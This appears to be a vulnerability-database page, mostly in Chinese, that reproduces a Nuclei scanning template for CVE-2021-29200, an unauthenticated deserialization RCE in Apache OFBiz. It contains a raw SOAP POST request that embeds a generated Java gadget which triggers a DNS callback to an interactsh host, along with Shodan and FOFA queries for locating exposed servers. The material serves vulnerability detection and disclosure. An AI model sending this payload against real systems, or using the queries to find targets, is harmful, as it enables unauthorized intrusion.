CVE-2021-29200: Apache OFBiz < 17.12.07 - Arbitrary Code Execution

日期: 2025-08-01 | 影响软件: Apache OFBiz | POC: 已公开

漏洞描述

Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack

PoC代码[已公开]

id: CVE-2021-29200

info:
  name: Apache OFBiz < 17.12.07 - Arbitrary Code Execution
  author: your3cho
  severity: critical
  description: |
    Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack
  reference:
    - http://www.openwall.com/lists/oss-security/2021/04/27/4
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29200
    - https://github.com/freeide/CVE-2021-29200
    - https://lists.apache.org/thread.html/r108a964764b8bd21ebd32ccd4f51c183ee80a251c105b849154a8e9d%40%3Ccommits.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/r708351f1a8af7adb887cc3d8a92bed8fcbff4a9e495e69a9ee546fda%40%3Cnotifications.ofbiz.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-29200
    cwe-id: CWE-502
    epss-score: 0.92775
    epss-percentile: 0.9975
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query:
      - html:"OFBiz"
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - app="Apache_OFBiz"
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve2021,cve,apache,ofbiz,deserialization,rce

http:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header/>
            <soapenv:Body>
              <ser>
                <map-HashMap>
                  <map-Entry>
                    <map-Key>
                      <cus-obj>{{generate_java_gadget("dns", "http://{{interactsh-url}}", "hex")}}</cus-obj>
                    </map-Key>
                    <map-Value>
                      <std-String value="STDSTRING"/>
                    </map-Value>
                  </map-Entry>
                </map-HashMap>
             </ser>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'value="responseMessage"'
# digest: 490a00463044022027928af647a74fd154e8283a3a120da9f5f81826052623c8a9d6220a20069b5f022022c71a58b0e7cdcb6fb2169d7e6e3a8f0e4a9140fd8ad1449a5a16ad13f957b0:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-29200.yaml

相关漏洞推荐